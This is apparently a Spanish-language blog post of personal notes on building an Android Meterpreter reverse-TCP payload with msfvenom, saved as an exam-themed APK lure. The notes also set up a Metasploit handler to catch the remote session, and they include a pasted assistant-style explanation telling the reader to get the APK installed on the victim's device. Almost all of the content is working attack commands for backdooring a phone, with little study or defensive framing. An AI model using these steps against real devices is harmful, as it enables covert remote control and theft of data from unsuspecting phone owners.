ASEGURARSE IP
(copia tu ip) en mi caso 10.10.10.138 es de la NAT, con el wifi es 192.168.0.13
PAYLOAD : La carga util que sera enviada a la victima
exploit es una vulnerabilidad
playload la carga que se usa en esa vulnerabnilidad
msfvenom -p android/meterpreter/reverse_tcp LHOST=(IP DEL KALI COMO 192.168.0.108) LPORT=666 -o /home/kali/Desktop/ExamenesdeEnruta.apk
Enviar del Kali a Windows
USAR MODO DE ESCUCHA
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.108 # Asegúrate de usar la IP correcta de tu máquina Kali
set LPORT 666 # Asegúrate de usar el puerto correcto
exploit
cd Desktop
ls
(verificar que este el apk y comandos
msfconsole -r comandos
marco teorico
Sí, puedo ayudarte con eso. Para configurar Metasploit para escuchar las conexiones entrantes, sigue estos pasos:
1. **Inicia Metasploit**:
```bash
msfconsole
```
2. **Selecciona el Exploit y Configura el Payload**:
Una vez que estés en la consola de Metasploit, necesitas configurar el payload y las opciones de escucha. Los comandos que necesitas son similares a los que se muestran en la imagen.
```bash
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.108 # Asegúrate de usar la IP correcta de tu máquina Kali
set LPORT 666 # Asegúrate de usar el puerto correcto
exploit
```
Estos comandos configurarán Metasploit para escuchar conexiones entrantes en el puerto 666 desde la dirección IP especificada. Aquí tienes una explicación detallada de cada comando:
- `use exploit/multi/handler`: Selecciona el módulo de escucha genérico para manejar las conexiones de payload.
- `set payload android/meterpreter/reverse_tcp`: Configura el payload que se utilizará. En este caso, es el payload para Android que se conecta de vuelta a la máquina atacante usando TCP.
- `set LHOST 192.168.0.108`: Establece la dirección IP de tu máquina Kali Linux (cambia a la IP correcta).
- `set LPORT 666`: Establece el puerto en el que Metasploit escuchará las conexiones entrantes.
- `exploit`: Inicia el exploit, configurando Metasploit para escuchar las conexiones entrantes.
Asegúrate de que el archivo APK generado sea instalado en el dispositivo Android y que el dispositivo tenga acceso a la red en la que se encuentra tu máquina Kali Linux. Una vez que se ejecute la aplicación en el dispositivo Android, deberías ver una sesión de Meterpreter abrirse en tu consola de Metasploit.
No hay comentarios.:
Publicar un comentario